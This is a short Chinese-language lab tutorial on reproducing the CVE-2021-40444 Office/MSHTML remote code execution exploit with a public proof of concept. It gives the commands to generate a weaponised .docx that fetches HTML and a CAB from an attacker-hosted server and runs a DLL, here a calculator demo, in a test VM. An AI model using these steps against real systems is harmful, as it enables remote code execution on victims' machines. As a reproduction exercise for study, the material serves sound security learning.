项目地址在https://github.com/lockedbyte/CVE-2021-40444。先下载到kali里。
由于此项目必须使用lcab,所以我们先在kail里安装一下。
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看帮助信息
lcab --help
进入下载后的CVE-2021-40444目录里,执行:
python3 exploit.py generate test/calc.dll http://
:3333
看见“You can execute now the server and then send document.docx to target” 说明就可以了。
然后用python开一个http服务,端口用刚刚设置的3333 或者自己设置的端口号。
sudo python3 exploit.py host 3333
把CVE-2021-40444目录里的子目录out下的document.docx文件copy到虚拟机中执行。
word打开后,可以看见这里在下载我们kali上的html文件。
html又会下载calc.cab 文件执行其中的命令,最后弹出计算器。
服务端显示的结果: